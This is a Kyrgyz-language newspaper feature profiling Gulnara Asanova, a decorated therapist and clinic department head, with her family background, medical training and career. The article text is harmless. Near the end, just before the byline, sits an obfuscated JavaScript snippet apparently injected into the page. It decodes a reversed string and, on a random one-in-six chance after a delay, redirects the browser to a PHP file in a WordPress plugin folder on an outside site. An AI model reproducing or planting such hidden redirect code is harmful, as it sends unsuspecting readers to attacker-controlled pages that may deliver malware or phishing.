ГҮЛНАРА ЖАНА АСАН ЧОҢ АТА

25-февраль, 2022-ж. / Редакция / Жаңылыктар 32

— Өз ишиңдин мыкты адисисиң. Көптүн оозундасың. Элдин жылуу сөзүнө арзып келе жатасың…

Жетимиштен ашып калган адам ушу жөнүндө ойлоду. Көп мезгил ындыны өчкөндөй абалда болгон. Ушул эле жерге нечен ирет кайрылган. Абалы бир аз жакшыргандай болгону менен көп жылдан бери санаадан арыла алган эмес. Таң калыштуусу, азыр бир кезде күчкө толуп, иштесе да, ойносо да эч чарчабаган чагындагыдай сезди өзүн. Ооба, ал айылдын мыкты футболчуларынын бири эле, эркин күрөш боюнча райондун чемпиону болгон, аскерде жүргөндө да күрөштөн таанылган эле…

— Кандайча? Ишеним, күч кайдан келди?..

Оюнда ушулар. Жанындагы өзүнөн бир топ кичүү, жооптуу жетекчи кызматтарга чейин көтөрүлгөн Тынчтыкты карап, анын да саламаттыгынын жакшырып баратканына ичинен кубанды.

— Кандайсыз, агай?..

— Дурус, дурус. Дурусмун…

Гүлнара палатага киргенде өзүн мурдагыдан жакшы сезген адамга врач менен бирге жарык нур кошо келгендей сезилди.

Ал-жайын сурап, кан басымын текшерген соң дарылап жаткан врачы:

— Жакшы болгонго дагы убакыт керек. Ушул боюнча эле дарылоо улантылат. Кошумча сунушталган дарыларды ичүүнү үзгүлтүккө учуратпаңыз. Эч кабатыр болбоңуз. Бара-бара баары ордуна келет…

Муну укканда дарылануучунун көңүлү көтөрүлдү.

***

…Өзүнө карата жылуу сөз айтылса Гүлнаранын оюна эң алды Көлдүн Корумду айылынын эмгекчил активи, орусча мыкты сүйлөгөн, орус достору көп чоң атасы Шыйкынбаев Асандын, үйдүн шам чырагы, балдарынын эң жакын адамы, колхоздун талаачылык, апийим өстүрүү иштерине да катышып келген мээримдүү чоң апасы Салыйдын унутулгус болуп калган элестери келет. Кичине кези абдан сонун сезимдерди тартуулаган ошол чоң атасынын жана атасынын ыйык конушунда өттү. Атасы Мидин Асанов Россия жергесиндеги алыскы Горький шаарында Айыл чарба академиясынан билим алды. Окуу жайын бүткөндөн кийин шаарда жашап, Кыргыз айыл чарба институтунда иштегени да буга себеп болду. Атасынын айыл чарба илимдеринин кандидаты даражасына ээ болгон учуру, айылдагылардын баарынын кубанганы алигиче эсинде…

Өзү иштеген институт атасы үчүн кымбаттын-кымбаты эле. Мыкты окутуучу, декан, профессор, алтын адам катары сыймыкка бөлөндү. Орус тили жана адабияты мугалими болуп иштеген апасы Каный Шаменова кийин көп жылдар бою Кыргызстандын илимдер академиясында эмгектенди. Жакшы сапаттары менен зор сый-урматка жетти.

Айылда өскөнүндө, кийин шаардан окуп, жайкысын айылга, өзү тезирээк жетсем деп дегдеген Ысык-Көлгө барганында элге кадыр-барктуу Асан чоң атасы андан кайсы кесипке ээ болууну кааларын сурап калаар эле.

Ошондо Гүлнара небереси:

— Милицияда иштегим келет. Юрист болууну каалайм, — дечү.

Анда чоң атасы жайма-жай мындайча түшүндүрөөр эле:

— Ал кесип да жакшы. Белге тапанча тагынып жүрүү керек. Кыздар үчүн баарынан жакшысы – врачтык кесип. Ошону танда. Врач болууга умтул…

Сулуунун сулуусу, куунак көңүл, кызыктарга бай жаш кезде өзүн алдыңкы окуучу катары көрсөткөн Гүлнара чоң атасынын каалоо-тилегине анча деле маани берген эмес. Анын келечек жолун ошондогу насаат кеп аныктап койгонун ал кийин гана туйду. Баарысы ушуга байланганы бара-бара билине баштады. Фрунзедеги №2 орто мектепте окуган кезинде өзгөчө биология жана химия сабактарынан айырмаланганы да анын мединституттан окуп калуусуна себеп болду.

***

…1974-1979-жылдар. Кызыктуу лекциялар, практикалык окуулар. Кыргыз мамлекеттик медицина институтунун баркы бийик көтөрүлүп турган маал. Дарылоо факультетинин студенттерине профессор, доценттер Миррахимов, Червинский, Жайлообаев, Фукс, Тарлов жана башка да окумуштуулар лекция окушчу. Ал сабактар чоң кызыгууну туудурчу. Мыкты педагог-илимпоздордон алган билимдин таасири, тереңдиги өзгөчө болчу. Институттун ректору Санжарбек Данияровдун окуу жайын СССР боюнча алдыңкылардын катарына жеткиргени, окуган студенттердин, институтту бүтүргөн жаш медиктердин билим деңгээлинен ачык сезилип турчу.

— Биз билим алган мезгил өзүнчө бир сонун учур эле. Окуунун сапаты бийик эле. Мектепте да, жогорку окуу жайында да билим үчүн болгон кызыгуу, ошондой эле талап дагы такыр башкача болчу. Ошондон улам окуучулардын да, студенттердин да билим деңгээли жогору болгон, — деп эскерди Гүлнара Асанова.

***

…А кезде Гүлнаранын бүт көңүлү институтта, врачтык билим деңгээлин жогорулатууда болду. 1980-1982-жылдары клиникалык ординатурадан окуусун улантты. Илим жолуна түшүүнү самады. Бирок бара-бара врач болууну тандады. Ушул иш ага кызыктуудай сезилди. Заводдун клиникасында участкалык врач болуп иштей баштады. Анда Фрунзедеги Ленин атындагы заводдун өзгөчө өнүккөн учуру эле. Кызыктуу врачтык иш, үйрөнүп-такшалуунун учуру. Мындан кийин 1985-жылы конкурстук тандап алуунун негизинде Өкмөткө караштуу №4 башкы башкармалыктын ооруканасына же элде “Атайын поликлиника” деп аталган клиникага участкалык терапевт болуп кабыл алынды. Жакшы иштери менен таанылды. 1988-жылдан баштап адеп диспансердик, анан “нолёвка” делген бөлүмдүн башчысы болду. 2017-жылы терапевт бөлүмүнүн башчылыгына дайындалды. Азыр да ушул кызматта эмгектенип жаткан чагы.

Бөлүм башчы Гүлнара Асанова ошол мезгилде клиниканын деңгээлин көтөрүүдө Кушбак Кадырбеков, кийин Асан Жайлообаев өзгөчө эмгек сиңиришкенин өтө кубануу менен белгиледи.

— Жаш врачтар үчүн доцент, профессор Асан Жайлообаевич эң мыкты насаатчы боло алды. Устатыбыздын көп кырдуу билимине, терапевт, кардиолог, невролог, дегеле дарыгер катары баарын терең өздөштүргөндүгүнө, талапты катуу коё билгендигине, уюштуруучулук жөндөмүнө бир чети таң калсак, бир жагынан бизге чоң өрнөк болду, — деди азыр өзү дасыккан врач Гүлнара Асанова.

Ал калктын саламаттыгын сактоо ишиндеги мыкты эмгеги үчүн “Саламаттык сактоонун отличниги” төш белгисине, Кыргыз Республикасынын Ардак грамотасына, 2006-жылы “Кыргыз Республикасынын эмгек сиңирген врачы” ардак наамына ээ болду. Көпчүлүктү сүйүнткөнү – бүгүн Гүлнара Асанова адамдардын асыл өмүрүн узарткан өлкөбүздөгү эң мыкты врач-терапевттердин бири. Бир аз оорулары бар адамдар гана эмес, жаны кыйналып, көздөн жашы салаа-салаа куюлгандар да сакайышып, өзүлөрүн дарылаган Гүлнараны алкаганы-алкаган. Алар аны элдин ден соолугу үчүн жаралган таланттуу врач деп эсептешет.

***

…Баары өз иши менен элек, бардык жумуш так уюштурулган. Мында ызы-чуу, карбаластоо деген түк байкалбайт. Иштин жогорку деңгээлде уюштурулганын врачтар да, медайымдар да, техникалык кызматкерлер да кызматтык милдеттерин эң мыкты аткарышарын дарылануучулар дароо эле сезишет. Бул болсо оору чулгап, көңүлү суз тарткан сыркоолуу адамдардын бат сакайып кетишине шарт түзөт. Мындай жагымдуу көрүнүштүн орун алышы да бөлүмдүн башчысы Гүлнара Асанованын эмгеги.

Өз кесибин сүйгөн Гүлнара Мидиновнанын иш тажрыйбасынын баалуу жактары көп. Анын пикири боюнча дарылоого киришүүдөн мурда сыркоолуунун абалын, буга чейин эмне менен ооругандыгын кылдат иликтөөнүн мааниси чоң. Ар тараптуу медициналык текшерүүлөрдөн өткөрүп, зарыл анализдерди алуу өз убагында жүргүзүлгөндө, диагноз туура коюлганда дарылоонун натыйжасы жогорку болот.

— Сөз да адамды айыктырат. Оорулууга жакшы сөз айтып, көңүлүн көтөрө билүү – дарылоонун ийгиликтүү болушун касыздоочу себептерден болуп саналат. Оорулуу адамдын абалын түшүнүп, ага жардам берүүгө бүт ыкласыңды койгондо, ал муну туйганда гана ишеним пайда болот. Оорулуу кишинин ордуна өзүңөрдү коюп, өз адамыңдай, бир тууганыңдай мамиле жасаганга үйрөнгүлө, — деп көп айтат, ал жаш медиктерге, кесиптештерине.

— Мен бирге иштешкен сонун адамдар – врачтар, медайымдар, кызматкерлер менен сыймыктанам. Бизге карата айтылган жылуу сөздөр, көңүлдү көтөргөн алкоолор – жалпы коллективибиздин ийгилиги, ар бир кызматкерибиздин жакшы иши — деп кошумчалады сөз арасында Гүлнара айым.

***

Турмуш жолун айрылгыс ынактай бирге арымдап, бири-бирине куп жарашкан үлгүлүү, нарктуу жактары менен эл ичинде жогорку сый-урматка жеткен өмүрлүк жубайлар – Гүлнара Мидиновна менен Асанкул Искаковичти көргөндө, алар менен баарлашканда кимдин болбосун көңүлү көтөрүлбөй койбойт. Элге, көздөгөн иштерине сиңирген эмгектери мөмөлүү дарактай жемиштүү болгону кубантат. Асанкул Искаков болсо Кыргыз мамлекеттик университетин бүткөн мыкты математик жана Москвадан экинчи жогорку билимге ээ болгон тамак-аш өнөр жайы боюнча билимдүү адис. Ал жаш кезинен өзүн көрсөтүп, жооптуу кызматтарда иштеди, ири комбинаттын директорлугуна көтөрүлдү. Жаш жетекчи мында да бат эле айырмаланды. Ишти жогорку деңгээлде уюштуруп, өзү жетектеген ишкананы алдыңкылардын катарына алып чыкты. Мындан соң да кайда иштебесин мыкты эмгеги, эң сонун адамгерчилик сапаттары менен коллективдин, элдин бийик урматтоосуна жете алды.

Азыр үлгүлүү жубайлардын уул-кыздын, неберелердин окуудагы, иш жагындагы ийгиликтеринин кубанычына бөлөнгөн чагы. Бул да кадырлаша өмүр сүргөн жубайлардын чоң бактысы…

Ооба, касиеттүү Ысык-Көлдүн сыймыктуу кызы, берекелүү Сары-Өзөн Чүйдүн кадырлуу келини Гүлнара Мидиновна да, өрнөктүү инсан, эл урматтаган Асанкул Искакович да турмуштан, эмгектен бактысын табышты. Аларга, биздин жакшы адамдарыбызга мактоо сөз гана жарашат…

***

…Бүгүн да демейдеги иш күнү. Бүт убактысын адамдын ден соолугу үчүн арнаган, эмгегин эл баалап, чыныгы дарыгер деген сыймыкка арзыган Гүлнара Мидиновнага өзүнө чоң таасир берген биринчи насаатчысы Асан чоң атасы дайыма жанында жүргөндөй сезилет. Кичинесинде айылда өскөнүндө чоң атасынын ага карата айткандарын, эң алды – адам болуу керек, билимдүүлүк, мээнеткечтик – асыл сапаттардан деген баалуу акыл-кеңештерин унутпай, азыркыга чейин жүрөгүндө сактап келет…

 $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/25_02_organized.pdf»>2022-жылдын 25-февралы

Курманбек РАМАТОВ

25-февраль, 2022-ж. / Редакция / Жаңылыктар 32
Бөлүшүү: Telegram WhatsApp X